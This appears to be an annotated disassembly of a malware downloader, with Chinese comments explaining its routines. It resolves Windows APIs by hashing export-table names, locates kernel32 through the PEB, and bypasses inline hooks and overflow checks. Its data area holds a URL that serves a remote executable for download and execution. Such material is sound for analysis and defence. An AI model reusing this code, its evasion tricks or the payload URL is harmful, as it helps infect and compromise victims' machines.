Get_EnumWindows:
0040742B > E8 7EFEFFFF call <GetUser32>
00407430 68 1A7A1E02 push 21E7A1A
00407435 50 push eax
00407436 E8 C2000000 call <GetAPIFromExport>
0040743B 83C4 08 add esp, 8
0040743E C3 retn
Get_DestroyWindow:
0040743F > E8 6AFEFFFF call <GetUser32>
00407444 68 E05B3094 push 94305BE0
00407449 50 push eax
0040744A E8 AE000000 call <GetAPIFromExport>
0040744F 83C4 08 add esp, 8
00407452 C3 retn
Get_GetWindowThreadProcessId:
00407453 > E8 56FEFFFF call <GetUser32>
00407458 68 97C9E2A3 push A3E2C997
0040745D 50 push eax
0040745E E8 9A000000 call <GetAPIFromExport>
00407463 83C4 08 add esp, 8
00407466 C3 retn
Get_GetClassNameA:
00407467 > E8 42FEFFFF call <GetUser32>
0040746C 68 6824C5B3 push B3C52468
00407471 50 push eax
00407472 E8 86000000 call <GetAPIFromExport>
00407477 83C4 08 add esp, 8
0040747A C3 retn
Get_CreateProcessA:
0040747B > E8 57000000 call <Getkernel32>
00407480 68 72FEB316 push 16B3FE72
00407485 50 push eax
00407486 E8 72000000 call <GetAPIFromExport>
0040748B 83C4 08 add esp, 8
0040748E C3 retn
Get_#101Inshdocvw:
; 得到shdocvw.dll中导出序号为101的函数地址。
; 由于这里是按序号查找的,所以这里唯一一次使用了GetProcAddress,在调用GetProcAddress的时候尝试绕过防溢出检测和INLINE HOOK。
0040748F > E8 44FEFFFF call <Getshdocvw>
00407494 EB 13 jmp short 004074A9
00407496 6A 65 push 65
00407498 50 push eax
00407499 E8 F7FBFFFF call <FindRetCodeInkernel32>
0040749E 50 push eax
0040749F E8 ABFEFFFF call <Get_GetProcAddress>
004074A4 ^ E9 B7FCFFFF jmp <CallPassingInlineHook>
004074A9 E8 E8FFFFFF call 00407496
004074AE C3 retn
Get_URLDownloadToCacheFileA:
004074AF > E8 A9FDFFFF call <Geturlmon>
004074B4 68 4FEF4F05 push 54FEF4F
004074B9 50 push eax
004074BA E8 3E000000 call <GetAPIFromExport>
004074BF 83C4 08 add esp, 8
004074C2 C3 retn
Get_LoadLibraryA:
004074C3 > E8 0F000000 call <Getkernel32>
004074C8 68 8E4E0EEC push EC0E4E8E
004074CD 50 push eax
004074CE E8 2A000000 call <GetAPIFromExport>
004074D3 83C4 08 add esp, 8
004074D6 C3 retn
Getkernel32:
; 得到kernel32.dll的基址,这一块太common了。在WIN9X和NT以上采用不同的代码。
004074D7 > 33C0 xor eax, eax
004074D9 64:8B40 30 mov eax, dword ptr fs:[eax+30]
004074DD 85C0 test eax, eax
004074DF 78 10 js short 004074F1
004074E1 3E:8B40 0C mov eax, dword ptr [eax+C]
004074E5 3E:8B70 1C mov esi, dword ptr [eax+1C]
004074E9 AD lods dword ptr [esi]
004074EA 3E:8B40 08 mov eax, dword ptr [eax+8]
004074EE C3 retn
004074EF EB 0B jmp short 004074FC
004074F1 3E:8B40 34 mov eax, dword ptr [eax+34]
004074F5 83C0 7C add eax, 7C
004074F8 3E:8B40 3C mov eax, dword ptr [eax+3C]
004074FC C3 retn
GetAPIFromExport:
; 根据DLL模块基址和函数名加密HASH值,遍历DLL的输出表找到API函数地址,这也是common的模块。
004074FD > 60 pushad
004074FE 36:8B6C24 24 mov ebp, dword ptr [esp+24]
00407503 36:8B45 3C mov eax, dword ptr [ebp+3C]
00407507 36:8B5405 78 mov edx, dword ptr [ebp+eax+78]
0040750C 03D5 add edx, ebp
0040750E 3E:8B4A 18 mov ecx, dword ptr [edx+18]
00407512 3E:8B5A 20 mov ebx, dword ptr [edx+20]
00407516 03DD add ebx, ebp
00407518 E3 3B jecxz short 00407555
0040751A 49 dec ecx
0040751B 3E:8B348B mov esi, dword ptr [ebx+ecx*4]
0040751F 03F5 add esi, ebp
00407521 33FF xor edi, edi
00407523 33C0 xor eax, eax
00407525 FC cld
00407526 AC lods byte ptr [esi]
00407527 84C0 test al, al
00407529 74 07 je short 00407532
0040752B C1CF 0D ror edi, 0D
0040752E 03F8 add edi, eax
00407530 ^ EB F4 jmp short 00407526
00407532 36:3B7C24 28 cmp edi, dword ptr [esp+28]
00407537 ^ 75 DF jnz short 00407518
00407539 3E:8B5A 24 mov ebx, dword ptr [edx+24]
0040753D 03DD add ebx, ebp
0040753F 66:3E:8B0C4B mov cx, word ptr [ebx+ecx*2]
00407544 3E:8B5A 1C mov ebx, dword ptr [edx+1C]
00407548 03DD add ebx, ebp
0040754A 3E:8B048B mov eax, dword ptr [ebx+ecx*4]
0040754E 03C5 add eax, ebp
00407550 36:894424 1C mov dword ptr [esp+1C], eax
00407555 61 popad
00407556 C3 retn
LastCode:
00407557 E8 66FBFFFF call 004070C2
DataArea:
0040755C ASCII: "http://down.zhahaa.cn/down/new.exe"
